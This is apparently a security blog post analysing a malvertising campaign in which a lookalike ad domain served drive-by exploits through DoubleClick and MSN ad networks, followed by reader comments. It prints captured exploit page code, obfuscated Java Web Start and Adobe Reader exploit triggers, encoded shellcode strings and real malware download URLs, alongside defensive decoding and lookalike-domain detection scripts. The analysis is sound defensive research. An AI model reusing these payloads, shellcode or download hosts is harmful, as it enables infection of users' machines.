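const PLAIN = "012345" + "6789abcde" + "fghijklmn" + "opqrstuvwx" + "yzABCDEFGHIJ" +
  "KLMNOPQ" + "RSTUVWXYZ/.:_-?&=%";
const CIPHER = "SP%cpH2W5C" + "83fEX:1r" + "jF9AQdM" + "lKi/sk4GuvtxJOB" + "m_U.Nq" +
  "zY7aw&nhgZo" + "VT=0IbRDye?6-L";

// Tolerant percent-decoder with the semantics of the legacy unescape():
// %XX and %uXXXX are decoded, malformed sequences are left untouched.
function pctDecode(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Layer 1: percent-decode. Layer 2: reverse. Layer 3: map each character from
// CIPHER to PLAIN (unknown characters are dropped, as in the original loop),
// then percent-decode the result to get the script the loader would have run.
function decodeLoader(payload) {
  const reversed = pctDecode(payload).split("").reverse().join("");
  let mapped = "";
  for (const ch of reversed) {
    const i = CIPHER.indexOf(ch);
    if (i !== -1) mapped += PLAIN.charAt(i);
  }
  return pctDecode(mapped);
}

// Pull iframe targets out of decoded script text. Matches both a literal
// "<iframe" and the "%3Ciframe" form used inside unescape("...") calls.
const IFRAME_RE =
  /(?:<|%3C)iframe\b[^>]*?\bsrc\s*=\s*(['"])(.*?)\1([^>]*?)(?:>|%3E)/gi;

function findIframes(script) {
  const hits = [];
  for (const m of script.matchAll(IFRAME_RE)) {
    const src = m[2];
    const attrs = m[3];
    let host = null;
    try { host = new URL(src).hostname; } catch (e) { /* relative or malformed src */ }
    // Invisible frames (hidden, or 0/1 pixel) are the ones that carry the exploit.
    const hidden = /visibility\s*:\s*hidden/i.test(attrs) ||
      /\b(?:width|height)\s*=\s*['"]?[01]['"]?(?!\d)/i.test(attrs);
    hits.push({ src, host, hidden });
  }
  return hits;
}

// Inverse transform, used only to build the constructed sample below.
function encodeFixture(text) {
  const pct = (s) => s.split("").map(
    (c) => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
  const mapped = pct(text).split("").map((c) => CIPHER.charAt(PLAIN.indexOf(c))).join("");
  return pct(mapped.split("").reverse().join(""));
}

// Constructed sample with the same shape as the decoded script on this page:
// one hidden 1x1 iframe and one visible banner iframe. Hosts are placeholders.
const SAMPLE_SCRIPT =
  "document.write(unescape(\"%3Ciframe src='http://landing.example/show.php?key=K' " +
  "style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E\"));\n" +
  "document.write('<iframe src=\"http://ads.example/banner.php\" width=\"728\" " +
  "height=\"90\"></iframe>');\n";
const SAMPLE_PAYLOAD = encodeFixture(SAMPLE_SCRIPT);

for (const f of findIframes(decodeLoader(SAMPLE_PAYLOAD))) {
  console.log((f.hidden ? "HIDDEN " : "visible") + " " + f.host + "  " + f.src);
}
```

To analyze a captured copy of the loader, pass the concatenated reno1 through reno21 string to decodeLoader and review the returned text and the findIframes output instead of rendering the page.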


Here, acerdse.com, blindry.com, careepi.com, and colemuns.com, which all resolve to the same IP 91.213.217.194, have been used interchangeably to serve the exploit. The exploits are served using a derived version of the Eleonore exploit pack. Code is as follows:
<html><body><div id="obj"></div><div id="pdf"></div><div id="java"></div><script>host = "h$$t$$tp:/$$$/$$co$$$l$$$$e$$$mun$$s$$.co$$m$$$/$$p$$u$$$p$$s$$$$e$$g$$"; host = host.replace(/[$]/g, ""); key = "92e93d0553cdb3c89d7d397457811f6d"; user = "root";</script>
<applet code='main.class' archive='26dd43dcf27/105aac7339e.jar' width='255' height='136'><param name='game_id' VALUE='i//WgzzL5CmfpbXJL5fzWpWXmezq5jpfJWiWIq9Zh&hPHS:DmK9dwmdEvuQQELv#ELldvNvEdNkQNl==qnv:p9j55/'></applet><script>var iirduoa613057 = "_4044d626a1c";var aaxiubfm563272 = "_01ad045ecb0";var nizzuyweo160751 = "_93462cf8707";var feihoaejc896221 = "_aa4b7467bcb";var ev = 'yeegsgvsssaglh';/* aexzwfu263553 = 96; <ouafo10632> */var vuuyey275779 = "_aa398c568ba";var eurtpji70479 = "_c5fb02cb5f1";var dyeiya128404 = "_61d73e9a8f2";/* angfo215506 = 35; <vewoxiaiua264194> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';/* uxoexyk720677 = 80; <qrybyerce87643> */var eoegeoypam602661 = "_a05c49dbaf1";var uadviiio547663 = "_20bc608bd2a";qrsyuoihooa = 'QQQ\rQQQ\nQQQ QQQ QQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQpQQQdQQQfQQQ_QQQiQQQeQQQ(QQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ{QQQ\rQQQ\nQQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQoQQQbQQQjQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\"QQQ<QQQOQQQBQQQJQQQEQQQCQQQTQQQ QQQiQQQdQQQ=QQQjQQQdQQQfQQQ1QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ0QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ0QQQ QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ=QQQcQQQlQQQsQQQiQQQdQQQ:QQQCQQQAQQQ8QQQAQQQ9QQQ7QQQ8QQQ0QQQ-QQQ2QQQ8QQQ0QQQDQQQ-QQQ1QQQ1QQQCQQQFQQQ-QQQAQQQ2QQQ4QQQDQQQ-QQQ4QQQ4QQQ4QQQ5QQQ5QQQ3QQQ5QQQ4QQQ0QQQ0QQQ0QQQ0QQQ>QQQ<QQQ/QQQOQQQBQQQJQQQEQQQCQQQTQQQ>QQQ\"QQQ;QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQjQQQdQQQfQQQ1QQQ.QQQGQQQeQQQtQQQVQQQeQQQrQQQsQQQiQQQoQQQnQQQsQQQ(QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ,QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ=QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ 
QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ;QQQ\rQQQ\nQQQ QQQiQQQfQQQ QQQ(QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ7QQQ.QQQ1QQQ.QQQ4QQQ\"QQQ)QQQ QQQ|QQQ|QQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ8QQQ.QQQ1QQQ.QQQ7QQQ\"QQQ)QQQ QQQ|QQQ|QQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ9QQQ.QQQ2QQQ\"QQQ)QQQ)QQQ\rQQQ\nQQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQpQQQdQQQfQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\'QQQ<QQQiQQQfQQQrQQQaQQQmQQQeQQQ QQQsQQQrQQQcQQQ=QQQ\"QQQ2QQQ6QQQdQQQdQQQ4QQQ3QQQdQQQcQQQfQQQ2QQQ7QQQ/QQQ2QQQeQQQaQQQ0QQQbQQQbQQQbQQQ7QQQ7QQQ4QQQfQQQ.QQQpQQQhQQQpQQQ?QQQhQQQoQQQsQQQtQQQ=QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ\"QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQfQQQrQQQaQQQmQQQeQQQbQQQoQQQrQQQdQQQeQQQrQQQ=QQQ\"QQQ1QQQ\"QQQ>QQQ<QQQ/QQQiQQQfQQQrQQQaQQQmQQQeQQQ>QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ}QQQ QQQ\rQQQ\nQQQ QQQ}QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ QQQ{QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQpQQQdQQQfQQQ_QQQiQQQeQQQ,QQQ QQQ4QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ\rQQQ\nQQQ\rQQQ\nQQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQjQQQdQQQtQQQ(QQQ)QQQ\rQQQ\nQQQ{QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQuQQQ QQQ=QQQ QQQ\'QQQhQQQtQQQtQQQpQQQ:QQQ QQQ-QQQJQQQ-QQQjQQQaQQQrQQQ QQQ-QQQJQQQ\\QQQ\\QQQ\\QQQ\\QQQ1QQQ9QQQ5QQQ.QQQ5QQQ.QQQ1QQQ6QQQ1QQQ.QQQ1QQQ0QQQ\\QQQ\\QQQpQQQuQQQbQQQlQQQiQQQcQQQ\\QQQ\\QQQjQQQaQQQvQQQaQQQ.QQQjQQQaQQQrQQQ QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ/QQQfQQQoQQQrQQQuQQQmQQQ.QQQpQQQhQQQpQQQ?QQQfQQQ=QQQSQQQMQQQBQQQ&QQQkQQQeQQQyQQQ=QQQ\'QQQ+QQQkQQQeQQQyQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ QQQnQQQoQQQnQQQeQQQ\'QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQiQQQfQQQ 
QQQ(QQQwQQQiQQQnQQQdQQQoQQQwQQQ.QQQnQQQaQQQvQQQiQQQgQQQaQQQtQQQoQQQrQQQ.QQQaQQQpQQQpQQQNQQQaQQQmQQQeQQQ QQQ=QQQ=QQQ QQQ\'QQQMQQQiQQQcQQQrQQQoQQQsQQQoQQQfQQQtQQQ QQQIQQQnQQQtQQQeQQQrQQQnQQQeQQQtQQQ QQQEQQQxQQQpQQQlQQQoQQQrQQQeQQQrQQQ\'QQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQiQQQ\'QQQ+QQQ\'QQQdQQQ:QQQCQQQAQQQFQQQEQQQEQQQ\'QQQ+QQQ\'QQQFQQQAQQQCQQQ-QQQDQQQEQQQCQQQ\'QQQ+QQQ\'QQQ7QQQ-QQQ0QQQ0QQQ0QQQ\'QQQ+QQQ\'QQQ0QQQ\'QQQ+QQQ\'QQQ-QQQ0QQQ0QQQ0QQQ0QQQ-QQQAQQQBQQQCQQQ\'QQQ+QQQ\'QQQDQQQEQQQFQQQFQQQEQQQDQQQCQQQBQQQAQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ2QQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQ\'QQQ+QQQ\'QQQiQQQdQQQ:QQQ8QQQAQQQDQQQ9QQQ\'QQQ+QQQ\'QQQCQQQ8QQQ4QQQ0QQQ-QQQ0QQQ4QQQ4QQQ\'QQQ+QQQ\'QQQEQQQ-QQQ1QQQ1QQQDQQQ1QQQ-QQQBQQQ\'QQQ+QQQ\'QQQ3QQQEQQQ9QQQ-QQQ0QQQ0QQQ8QQQ0QQQ5QQQ\'QQQ+QQQ\'QQQFQQQ4QQQ\'QQQ+QQQ\'QQQ9QQQ9QQQDQQQ9QQQ3QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQeQQQlQQQsQQQeQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ 
</script>

The above decodes to:



Which shows the use of three exploits:
JDT: Java Web Start Arbitrary command-line injection (CVE-2010-0886)
Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
Microsoft MDAC RDS.Dataspace ActiveX (CVE-2006-0003)

Exploit code is also placed inside a PDF file: http://colemuns.com/pupseg/26dd43dcf27/2ea0bbb774f.php?host=http://colemuns.com/pupseg&u=root

Extracted, the JavaScript inside the PDF file is as follows:
//-------------------------------------------------------------
//-----------------Do not edit the XML tags--------------------
//-------------------------------------------------------------

//<Document-Actions>
//<ACRO_source>Document Open</ACRO_source>
//<ACRO_script>
/*********** belongs to: Document-Actions:Document Open ***********/
function ghfsdj(adbhsdh)
{
var jfsd = "gas%ss2u";
return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}
shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3E1&&EFD2&&C9C5&&8FC8&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3C8&&F6D1&&C7CA&&C3DF&&8FD4&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&D4D6&&C8CF&&C0D2&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C9E5&&CACA&&C4C7&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");
//</ACRO_script>
//</Document-Actions>

The obfuscation was sophisticated, showing the involvement of heavy manual effort. The javascript code is encoded with ASCII85Decode.

First, the deobfuscation function:

function ghfsdj(adbhsdh)
{
    // jfsd[3] is "%" and jfsd[7] is "u", so the join string is "%u"
    var jfsd = "gas%ss2u";
    return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}

The shellcode snippets below are obfuscated with the function:

shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&C...");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC..");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589..");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CA..");

The deobfuscation function replaces && prefixes with %u. And then, an interesting trick is used to hide the use of the eval() function from pattern-based detection:

var ev = 'yeegsgvsssaglh';
..
this[ev.charAt (2) + ev.charAt (6) + ev.charAt (10) + ev.charAt (12)] ('var th = thi' + 's[\'ev\'+\'\'+\'al\'];');
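
The two tricks above can be undone statically, without running the sample. The following is an added example, not code from the original post: it restates the `&&` to `%u` step, resolves the `charAt` chain and the split string literals to expose the hidden `eval`, and goes one step beyond the post by testing whether the `shcode_*` strings are single-byte XOR encoded (an assumption checked by searching for an `http` prefix). All function names are hypothetical.

```javascript
'use strict';
// Static triage of the two tricks described above. Nothing is evaluated:
// every step is string or byte processing.

// Constructed input: the truncated shcode_geticon prefix and the eval-hiding
// lines, both as quoted in the post.
const SHCODE_PREFIX = '&&D2CE&&D6D2&&899C&&C589&&CAC9&&C...';
const SAMPLE = String.raw`var ev = 'yeegsgvsssaglh';
this[ev.charAt (2) + ev.charAt (6) + ev.charAt (10) + ev.charAt (12)] ('var th = thi' + 's[\'ev\'+\'\'+\'al\'];');`;

// ghfsdj() restated: "&&D2CE&&D6D2" -> "%uD2CE%uD6D2".
function ampToPercentU(s) {
  return s.split('&&').join('%u');
}

// Bytes that unescape() would place in memory for %uXXXX units:
// each UTF-16 code unit is stored low byte first. Incomplete units are skipped.
function percentUToBytes(s) {
  const out = [];
  for (const m of s.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    out.push(unit & 0xff, unit >> 8);
  }
  return out;
}

// Try every single-byte XOR key and keep the one whose output starts with the
// crib. XOR encoding is a hypothesis tested here, not stated in the post.
function xorSearch(bytes, crib = 'http') {
  for (let key = 1; key < 256; key++) {
    const text = String.fromCharCode(...bytes.map((b) => b ^ key)).split('\0')[0];
    if (text.startsWith(crib)) return { key, text };
  }
  return null;
}

// Resolve NAME.charAt(i) + NAME.charAt(j) + ... against the string literal
// assigned to NAME in the same source.
function resolveCharAtChains(src) {
  const chain = /(\w+)\.charAt\s*\(\s*\d+\s*\)(?:\s*\+\s*\1\.charAt\s*\(\s*\d+\s*\))+/g;
  const found = [];
  for (const m of src.matchAll(chain)) {
    const lit = src.match(new RegExp('\\b' + m[1] + '\\s*=\\s*([\'"])(.*?)\\1'));
    if (!lit) continue;
    const idx = [...m[0].matchAll(/charAt\s*\(\s*(\d+)\s*\)/g)].map((x) => Number(x[1]));
    found.push({ expr: m[0], value: idx.map((i) => lit[2].charAt(i)).join('') });
  }
  return found;
}

// Fold 'a' + 'b' into 'ab' (escape-aware) until nothing changes.
function foldConcat(src) {
  const pair = /'((?:[^'\\]|\\.)*)'\s*\+\s*'((?:[^'\\]|\\.)*)'/g;
  let prev;
  let cur = src;
  do {
    prev = cur;
    cur = cur.replace(pair, "'$1$2'");
  } while (cur !== prev);
  return cur;
}

// Peel one layer: fold the outer literals, strip the quotes, undo the quote
// escaping, then fold the concatenations inside the recovered code.
function revealStringCode(expr) {
  const folded = foldConcat(expr.trim());
  const m = folded.match(/^'((?:[^'\\]|\\.)*)'$/);
  if (!m) return folded;
  return foldConcat(m[1].replace(/\\(['"\\])/g, '$1'));
}

// Report the names spelled by charAt chains and the code string passed to
// the computed call, with its concatenations folded.
function triage(src) {
  const arg = /\]\s*\(\s*('(?:[^'\\]|\\.)*'(?:\s*\+\s*'(?:[^'\\]|\\.)*')*)\s*\)/;
  const m = src.match(arg);
  return {
    hidden: resolveCharAtChains(src).map((c) => c.value),
    code: m ? revealStringCode(m[1]) : null,
  };
}

console.log(triage(SAMPLE));
console.log(xorSearch(percentUToBytes(ampToPercentU(SHCODE_PREFIX))));
```

Run against the truncated `shcode_geticon` prefix, `xorSearch` finds key 0xA6 and the text `http://col`, which is consistent with the colemuns.com download URLs listed in the post.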

The decoded javascript contains several pieces of exploit code for the different vulnerabilities below:

a) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ()

b) Adobe Acrobat and Reader util.printf (CVE-2008-2992)

c) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)

d) Adobe Reader GetMailInfo (CVE-2007-5659)

The javascript below checks for a matching version of exploitable Adobe Reader and if found, triggers the corresponding exploit:

aPlugins = app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for (var i=0; i < aPlugins.length; i++)
{
    if (aPlugins[i].name=="EScript")
    {
        var lv=aPlugins[i].version;
    }
}
if ((lv==9)||((sv==8)&&(lv<=8.12)))
{
    geticon();
}
else if (lv==7.1)
{
    printf();
}
else if (((sv==6)||(sv==7))&&(lv<7.11))
{
    collab();
}
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
{
    nplayer();
}

Initial detection rate of this PDF was extremely low--2 out of 42 on VirusTotal. It has improved a little since, but not much.

Upon successful exploitation, shellcode is executed and the browser downloads and runs the following two executables:
1. file.exe (HDD Plus), from: http://colemuns.com/pupseg/forum.php?f=MDAC&key=92e93d0553cdb3c89d7d397457811f6d&u=root, Virus Total results here.
2. 461-direct.exe (backdoor), from: http://searchjewel.org/any5/461-direct.exe, Virus Total results here.

Note that the binaries, and the ways that they were obfuscated, kept changing over the past few days.

Another installed malware is the Kazy downloader; see the VirusTotal report here.

Actually, the exploits themselves kept on changing, too. When we first detected this on Dec 3rd, it was serving only one exploit--CVE-2010-0806, and it wasn't from colemuns.com, but from thjlnqbtgdw.com and pbcplifpgdw.com. During this time, the NeoSploit exploit pack was used instead of the later Eleonore-like pack.

Part 2--rad.msn.com case study

Malvertising by ADShufffle on rad.msn.com started later than DoubleClick; however, the behavior is quite the same.

Upon visiting a website that is serving banners from rad.msn.com, for example mail.live.com, msnbc.com, or realestate.msn.com, the browser is presented with an ad tag for a 728x90 banner ad from rad.msn.com:
<script type="text/javascript" src="http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=REAB01&AP=1390" onreadystatechange="startTimer();"></script>

Here rad.msn.com throws out some obfuscated javascript, which decodes to:
<script type="text/javascript" src="http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=23444436&lpd=${REQUESTID}&ASTPCT=${CLICKURL}"><script>

This causes the browser to load from adshufffle. The actual 728x90 banner ad, which is, again, illegally copied, is http://media.topsann.com/bdb/aBigCommerce/728x90stat.gif:

And the rest is similar.
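
The ad tag above only differs from a legitimate partner's tag by one extra letter in the host name, which is the kind of difference an automated check catches more reliably than a human reviewer. The following is an added example, not part of the original post or of HackAlert: it extracts script hosts from ad tags and flags hosts that imitate an approved partner. The allowlist, the thresholds, the shortened paths and all function names are assumptions made for the illustration.

```javascript
'use strict';
// Flag script hosts in ad tags that imitate an approved ad partner.
// APPROVED is a constructed allowlist; a real one comes from the ad
// operations team's list of contracted partners.
const APPROVED = ['adshuffle.com', 'doubleclick.net', 'msn.com', 'google-analytics.com'];

// Constructed sample: hosts as named on this page, paths shortened except
// for the rad.msn.com tag, plus one unrelated host.
const AD_TAGS = [
  '<script type="text/javascript" src="http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=REAB01&AP=1390" onreadystatechange="startTimer();"></script>',
  '<script type="text/javascript" src="http://this.content.served.by.adshufffle.com/view.js"></script>',
  '<script src="http://goog1e-analytics.com/ga.js"></script>',
  '<script src="http://static.example.net/lib.js"></script>',
].join('\n');

// Naive registrable domain: the last two labels (assumption: no multi-label
// public suffixes such as co.uk in the input).
function baseDomain(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// Levenshtein edit distance, two-row dynamic programming.
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const row = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(prev[j] + 1, row[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = row;
  }
  return prev[b.length];
}

// Map digit-for-letter swaps and collapse repeated characters, so that
// "adshufffle" and "adshuffle" (or "goog1e" and "google") compare equal.
function skeleton(domain) {
  return domain.replace(/1/g, 'l').replace(/0/g, 'o').replace(/(.)\1+/g, '$1');
}

// approved: exact match on an allowlisted domain.
// lookalike: same skeleton, or within a small edit distance (2 for names of
// ten or more characters, otherwise 1).
// unknown: neither, which still needs a human decision.
function classify(host) {
  const base = baseDomain(host);
  if (APPROVED.includes(base)) return { host, verdict: 'approved', match: base };
  for (const good of APPROVED) {
    const limit = good.length >= 10 ? 2 : 1;
    if (skeleton(base) === skeleton(good) || editDistance(base, good) <= limit) {
      return { host, verdict: 'lookalike', match: good };
    }
  }
  return { host, verdict: 'unknown', match: null };
}

// Collect the hosts of every <script src="..."> with an absolute URL.
function scriptHosts(html) {
  const hosts = [];
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) {
    try {
      hosts.push(new URL(m[1]).hostname);
    } catch (e) {
      // relative or malformed URL: nothing to classify
    }
  }
  return hosts;
}

function reviewTags(html) {
  return scriptHosts(html).map(classify);
}

for (const r of reviewTags(AD_TAGS)) {
  console.log(r.verdict.padEnd(10), r.host, r.match ? '(' + r.match + ')' : '');
}
```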

At Armorize we've been developing technologies to detect drive-by downloads starting in 2000, with our first major publication released in 2003 at the WWW Conference. In 2007, we acquired X-Solve to push out our drive-by download detection service, HackAlert. Recently, we released a new version of HackAlert--HackAlert SafeImpression, which is geared towards malvertising detection and ease of use by the online media industry.
If you are interested in any information, please email us at wayne@armorize.com
Part 2 of the story: About HDD Plus spreading also through OpenX vulnerabilities, and a guy behind all this

13 comments:

EFN said...

Really a very nice explanation on how a drive-by-download is done. I must admit that even though it is used for exploits, there has been put some real effort into it and actually shows real craftsmanship. If only it would be used for something more constructive.

But you really wrote an excellent post on this!

Anonymous said...

It seems odd that two major ad networks would fall victim to the same attack vector simultaneously, without their site being compromised. As interesting as this writeup may be, it falls short in describing how "adshuFFFle" got injected into their ad code to begin with and whether or not these breaches of Double Click and MSN have been resolved. There is a big difference in correcting the domain name referenced in code and identifying and resolving the intrusion, if such an intrusion occurred.

Anonymous said...

@Anonymous

You didn't understand how this worked. The hackers registered adshufffle.com particularly for this purpose. This is not a domain that was compromised.

Using this domain, they *posed* as AdShuffle, a legit company, whose domain is actually addshuffle.com (correct spelling).

The people from DoubleClick and MSN who review advertising applications fell for it and didn't notice the difference in spelling.

They allowed adshufffle.com to push ads through its network and from there it was easy for the attackers to serve whatever they wanted.

This was basically a social engineering attack to begin with.

SpamLoco said...

Hi,

AVG false positive in Armorize Blog?

